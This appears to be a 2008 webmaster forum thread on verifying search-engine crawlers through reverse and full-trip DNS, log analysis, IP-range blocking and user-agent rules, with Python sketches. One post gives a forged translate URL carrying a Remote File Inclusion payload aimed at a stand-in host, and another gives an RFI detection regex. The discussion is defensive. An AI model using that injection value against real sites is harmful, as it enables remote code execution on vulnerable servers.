Forum Moderators: open
While reading the logs, I noticed at least two IPs coming from the MSN bot:
65.55.108.194, 65.55.25.149
Neither can be resolved to a host.
I saw another IP from Slurp that resolved to the .net domain instead of the .com. In both cases, attempting to match the agent info against the IP and host would return false. Does anyone know if there is a workaround?
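For reference, checking the PTR record is only a few lines in most languages; here is a minimal Python sketch (the results obviously depend on when and where you run it):

import socket

def reverse_lookup(ip):
    # Return the PTR hostname for an IP, or None when no PTR record exists.
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None

# The two MSN-bot IPs from above; at the time, neither returned a PTR record.
for ip in ("65.55.108.194", "65.55.25.149"):
    print(ip, "->", reverse_lookup(ip))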
I could not post on that thread as it was a bit old.
65.55.108.194
"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
I've had a portion of the UA denied since September 2006, when MS attempted to standardize their bot UAs.
Under both the previous UAs and the 2006 standardized UAs, MSN failed to comply with robots.txt for their MEDIA bot, which resulted in my denial.
Nothing in my saved files on the 65.55.25. Class C.
What does the UA look like?
I could not post on that thread as it was a bit old.
As an aside: you may always provide a link to an old thread (in a newer thread) for reference.
Don
As for the reference, yes, here is the link to the thread I was reading earlier:
[webmasterworld.com...]
SetEnvIfNoCase User-Agent msnbot\-media keep_out
Deny from env=keep_out
which does not even allow them access to robots.txt (a bad choice for most); as a result, the bot keeps returning regularly (due to my aforementioned bad choice) on endless crawls, eating 403's.
So my question is: should I block them by default, fall back to checking some IP ranges, or do something else entirely?
Neither I nor anybody else can say what is best for your own site(s).
We each must decide what is beneficial or detrimental.
I am able to convey that denying access to "msnbot-media" has NOT affected my other MSN crawls.
Don
65.55.232.29 - - [18/Nov/2008:01:39:16 -0500] "GET /someurl.html HTTP/1.1" 200 10415 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
Another thing I notice is that IPs that successfully resolved once do not resolve afterwards. I put a logging mechanism in place to see when and how often the host value differs when the IP is resolved.
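The mechanism itself is trivial; a minimal sketch of what I mean (Python; the log file name is just illustrative):

import socket
import time

RDNS_LOG = "rdns_changes.log"  # illustrative file name

def log_rdns(ip):
    # Append a timestamped PTR result for the IP, so lookups that suddenly
    # stop resolving (or change host) show up when scanning the log.
    try:
        host = socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        host = "UNRESOLVED"
    with open(RDNS_LOG, "a") as fh:
        fh.write("%s\t%s\t%s\n" % (time.strftime("%Y-%m-%d %H:%M:%S"), ip, host))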
Here is an example of an MSN issue: 65.55.165.zz, not a bot, however somehow with the ability to grab pages in a fashion similar to a bot.
At the time I focused on the "search.live" denial (which I may change) because I was not sure the user wouldn't simply return on another Class C range.
The user keeps returning, always with the same IP, and I've over-reacted by penalizing ALL "search.live" users.
MSN offers us "practices" that others simply don't use.
The 131.107.*.* range and the many things that have come through those IPs in five years are one example.
65.55.232.29 - - [03/Nov/2008:13:00:08 -0500] "GET /robots.txt HTTP/1.1" 200 85 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
Why would it need robots.txt at that time?
As for the IP range, I checked the logs again and I see different UAs, some with valid browser signatures. What I also notice is that none of these accesses, although they occur very often (same day), honor the headers the server sends, such as the caching headers that should produce a 304.
And finally, I see around 100 different page accesses on the server within the same minute from that IP range you posted.
Don, do you mean these are actual users (humans) who come indirectly from Live Search (e.g. checking the cached page)? I see accesses to the robots.txt file at the same time, along with other scripts, though.
enigma,
My apologies, I didn't mean to confuse the issue.
I merely presented it because the IP occurrence matched the one you had provided previously.
The link to the other thread was a sort of pre-fetch by "search.live". I'm inclined to believe it was the same human using the search as some sort of proxy and/or tool.
The page requests were all in succession and absent of requests for robots.txt, images or CSS.
It has happened on more occasions since the initial date, and all by the same IP.
Early recognition and/or action against these "bot-like" requests (even though they may not be bots) tends to nip things in the backside before they escalate (thus this forum), or before the user locates a more effective tool.
I don't utilize header checks, thus I'm no help in that regard. Bill, Jim and many of the others do use headers.
In addition, I have numerous references in my logs to the 65.55.232. Class C that you've provided (no reason for me NOT to believe it's a valid MSN bot), even when presented with invalid headers.
Some of these requests (i.e., 65.55.232.) were in close time-proximity to the 65.55.165.zz "search.live" requests, however NOT in succession or close enough time-proximity that I could associate BOTH IPs with the same data requests.
[projecthoneypot.org...]
Perhaps it shows that some of the services Microsoft provides are abused. What I don't understand is how come they're all over the place. There are way too many for them not to know about.
This has been covered elsewhere on WWW but it looks like an attempt by MS to verify their own results. Certainly I'm only seeing a handful of non-bot hits a day, mostly spaced out (this month: 41 non-bots to 282 bots). Could be they are trying to tie the bot and non-bot together. It doesn't look like third-party usage here.
One possibility, I suppose, is that they are using the non-bot UA to grab cached pages (I haven't checked for image-fetching).
I'm seeing a similar pattern with google. I've given up trying to understand yahoo / ask's wild forays - ask may soon be banned!
There are a lot of internet services that can be abused by an attacker to serve his purpose. For instance, search engines have translation services where an IP may not resolve to a host name even though it belongs to the search engine's server IP range. These services can be activated by anyone who requests a page translation, and the "translate" link can be forged to contain, say, some SQL injection or Remote File Inclusion (RFI) payload.
If you look at the other link I posted above, it shows the same IP being used for sending spam emails. With that particular honeypot it appears blacklisted. In reality it could be just one of the services Microsoft provides (e.g. accounts), where someone injected a script to do his dirty work.
For instance, I am seeing lots of RFI attempts in the server logs coming from Yahoo accounts. It seems these accounts were opened specifically for that purpose. Some hard-to-detect "txt" files are then used for the RFI attempts; they contain actual code such as PHP, so if the security hole in the specific script/web-engine/server is not patched, the attacker may gain direct or indirect control.
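A rough pattern match catches the obvious attempts. A minimal Python sketch of the kind of check I mean (it will miss URL-encoded variants):

import re

# A query-string parameter whose value is itself a full URL is the classic
# Remote File Inclusion signature showing up in the logs.
RFI_PATTERN = re.compile(r"[?&][^=&]*=\s*https?://", re.IGNORECASE)

def looks_like_rfi(request_uri):
    return bool(RFI_PATTERN.search(request_uri))

# e.g. the forged "translate" URL shown later in this thread would match:
# looks_like_rfi("/index.html/?_SERVER[DOCUMENT_ROOT]=http://rfi.example.com/nasty.htm")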
Up to this point I have been unable to find a reliable way to detect whether a server access is legitimate or indirect, and/or to reliably tell bots from humans. On the contrary, I see more and more evidence that a script can be set up to behave like a real person with a proper browser.
Where I discover abusive activity from a server farm I tend to block the IP range for that farm. There are a lot of nasties and very few legitimate bots that come from server farms, and I think I've whitelisted all of the good ones I'm prepared to give access to.
[voices.washingtonpost.com...]
The article is recent and implies that services of major vendors are abused for various spam purposes.
DNS resolution is also something I deploy against the scripts. It won't always stop them; they still appear with valid host names, valid IPs, and UAs. DNS spoofing is another area they exploit.
One other thing I am experimenting with, which may sound awkward, is simply running a search for an IP in the popular search engines. If results come up and the IP attempts to get in pretending to be human, the odds are it's some sort of hack or spam attempt.
The results that typically come up are from web statistics posted by various hosts (unbelievable but true) when the attempt caused some sort of error (e.g. a 404). Although this practice is far from perfect, it may give a hint about the intentions of the visitor.
DNS resolution is also something I deploy against the scripts. It won't always stop them; they still appear with valid host names, valid IPs, and UAs. DNS spoofing is another area they exploit.
Totally impossible with full-trip DNS.
You do a reverse DNS lookup, then a forward DNS lookup, and see if the IP matches.
If it doesn't match, it's DNS spoofing.
For efficiency and speed, I cache that information for 24 hours then test it again.
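For anyone who wants to try it, the whole check fits in a few lines. Here is a minimal Python sketch of the full-trip test with the 24-hour cache (an in-memory dict stands in for however you actually persist the results):

import socket
import time

_cache = {}            # ip -> (verdict, checked_at); a plain dict stands in for real storage
CACHE_TTL = 24 * 3600  # re-test after 24 hours, as described above

def full_trip_dns_ok(ip):
    # Reverse-resolve the IP to a hostname, forward-resolve that hostname,
    # and confirm the original IP is among the addresses returned.
    hit = _cache.get(ip)
    if hit and time.time() - hit[1] < CACHE_TTL:
        return hit[0]
    try:
        hostname = socket.gethostbyaddr(ip)[0]              # reverse DNS
        forward_ips = socket.gethostbyname_ex(hostname)[2]  # forward DNS
        verdict = ip in forward_ips
    except (socket.herror, socket.gaierror):                # no PTR, or the name won't resolve
        verdict = False
    _cache[ip] = (verdict, time.time())
    return verdict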
There is another detailed page that explains pretty much everything about the approach.
[unixwiz.net...]
It also shows workarounds that evolved to counter the effects of DNS cache poisoning.
Yes, caching the results is quite easy, but don't we need to be sure the results are right?
I can DNS spoof any IP I own to return "crawl*.googlebot.com".
However, if you run "crawl*.googlebot.com" to get the IP it won't match because I don't have control of googlebot.com so I can't fake it in that direction.
Worrying about DNS cache poisoning is like worrying about IP spoofing: it's possible, but highly unlikely. If you get nailed with DNS poisoning, there'll be a whole bunch of other people in trouble too; you won't be alone.
When I say caching the results, I mean I merely record the results of the full-trip DNS check to a temporary file under my control.
If the results are spoofed, I record spoofed results.
Can't worry about that, as I have to assume my host's DNS servers are secure; they applied all the patches mentioned in the PPT above.
The 72.14.193.* range is obviously part of Google's range, but it has no rDNS and arrives with anything from a blank UA to a Google Translate one. It seems it can be used by Google to service translations, but there is no rDNS check possible, only the fact that it belongs to Google. In the case of blank and other scraper UAs it's probably going via a proxy, although it doesn't register as such in my logs.
I'm loath to block the range, even if it comes up with scrapers, since it also seems to be a legit Google service. But if Google won't admit the usage and can't be bothered to designate specific and separate IPs for their own services and for proxies, what else is there to do? Either lose the translation and other legit services, or accept the scrape attempts.
I can't see how double-checking the DNS in this instance would result in anything other than a block, but that could well be the wrong action at least some of the time.
And what do you do with the 72.14.193.* range, Bill?
Bill's a pest ;)
I'd be more interested in whether Jim has made any adjustments on his end.
Personally, I've had the 72.14. denied for an eternity.
And most of the other SE-based extra tools as well; however, I'm an extremist, and it has been jokingly suggested that I should just "deny all" :)
Don
And what do you do with the 72.14.193.* range, Bill?
First off, you have to qualify what kind of activity you see in that range.
Remember, I mostly don't run hard rules; I run dynamic scripts that analyze behavior on the fly, so any IP being multi-purposed within an SE's range will be dealt with based on what it's currently doing.
If it says googlebot and the DNS doesn't resolve to crawl*.googlebot.com, it's instantly blocked; therefore someone trying to spoof Googlebot via the translator gets the heave-ho.
If it's not a valid browser, says "Java" or something similar, blocked.
Google's translator is permitted, but each IP forwarded by the proxy is tracked separately, and the whitelisted user-agent rules are still imposed, so anything other than an allowed browser is blocked.
Someone's script trying to scrape through the translator gets to have a conversation with a captcha, etc.
Basically, I don't have a single answer to your question, but a series of strategies designed to stop the automated nonsense and still let humans do their thing as much as possible.
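To make that chain concrete, here is a stripped-down Python sketch; the browser whitelist and the Googlebot test are simplified stand-ins for the real rules:

import socket

def claimed_googlebot_is_real(ip):
    # Full-trip check: the PTR must end in .googlebot.com and that name
    # must forward-resolve back to the same IP.
    try:
        hostname = socket.gethostbyaddr(ip)[0]
        return (hostname.endswith(".googlebot.com")
                and ip in socket.gethostbyname_ex(hostname)[2])
    except (socket.herror, socket.gaierror):
        return False

def classify(ip, user_agent):
    # Simplified decision chain: verify claimed crawlers, reject non-browser
    # agents outright, and let the rest through to further behavioral checks.
    ua = (user_agent or "").lower()
    if "googlebot" in ua:
        return "allow" if claimed_googlebot_is_real(ip) else "block"
    if not (ua.startswith("mozilla") or ua.startswith("opera")):
        return "block"  # blank UAs, "Java", and the like
    return "allow"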
I can't see how double-checking the DNS in this instance would result in anything other than a block, but that could well be the wrong action at least some of the time.
Been doing it for 2 years, ever since the SEs said it was the proper method of validation, with no ill effects.
First off, you have to qualify what kind of activity you see in that range.
1. Go to [translate.google.com...]
2. Say we want a translation from English to Spanish.
3. Populate the "translate a web page" URL with something like:
http://www.example.com/index.html/?_SERVER[DOCUMENT_ROOT]=http://rfi.example.com/nasty.htm
In this particular case Google should not allow direct translation, but perhaps only translate pages it already holds in its cache. Avoiding direct access would make sense, assuming a bot indexes a site from the domain only (and not from external links that can also carry RFI attempts). Instead, the facility can be used as an open URI for RFI attempts (or content scraping and the like).
1. A new page/article was published yesterday on a site (the site has no particular rank). Below, sample_page.html stands in for the new page; the real name was replaced.
2. The first IP is msnbot, crawling the page for the first time. It first accesses robots.txt, then the new page. That IP resolves, so the real page content is served.
3. The second IP also comes from the Microsoft servers and accesses the same page 2 minutes later. The request contains a referrer which implies the page was found via the Live search facility. The second IP does not resolve to a PTR; rDNS does not return anything.
Log Entries:
65.55.105.16 - - [28/Nov/2008:19:49:42 -0500] "GET /robots.txt HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.16 - - [28/Nov/2008:19:49:43 -0500] "GET /sample_page.html HTTP/1.1" 200 43435 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.107.245 - - [28/Nov/2008:19:51:42 -0500] "GET /sample_page.html HTTP/1.0" 200 9799 "http://search.live.com/results.aspx?q=sample_page" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
In other words, the log entries imply: a) msnbot comes in and crawls the new page; b) within 2 minutes the page is indexed and published in Live, someone searches for it, and it is accessed right away by "someone".
The UA is fake, of course; the second IP's access was made by a bot and receives something else instead of the real page content.
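The guard that swaps in the alternate content is essentially this (a Python sketch; the referrer hosts listed are just the ones appearing in these logs):

import socket

SE_REFERRER_HOSTS = ("search.live.com", "search.msn.com")  # hosts seen in these logs

def fake_se_visitor(ip, referrer):
    # Flag a request that claims a search-engine referrer but comes from an
    # IP with no PTR record -- the pattern in the log entries above.
    if not referrer or not any(h in referrer for h in SE_REFERRER_HOSTS):
        return False
    try:
        socket.gethostbyaddr(ip)
        return False  # PTR exists; treat as a normal visitor
    except (socket.herror, socket.gaierror):
        return True   # search referrer + unresolvable IP: serve the alternate content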
The UA is fake, of course; the second IP's access was made by a bot and receives something else instead of the real page content.
This refer (search.live.) eats 403's on my sites!
Too bad for the innocent and/or valid users.
I had sixteen requests in succession this morning from the 165 Class C, while utilizing fifteen different Class D's.
No requests for robots or images.
Many of the refers contained the name of the page (absent the extension).
MSN needs to resolve these issues, else I'm going to be adding more Class C's to my denials, which I'm sure will end up catching some valid bots. :(
Don
I have no reason to believe that any sentient living being uses Live Search.
I had ONE ;) just yesterday, which was a valid widget search topic.
The visitor initially entered one of my sites and was denied based on the refer.
I've another directory which does not place that restriction on live.search; however, the images and supporting files (CSS) come from the site's other directories and get 403'd. Once the visitor was allowed access via the open directory (after being denied in the initial request)?
Normal traffic patterns occurred, which were on-topic for the initial search.
Course, this may be a rare exception!
Don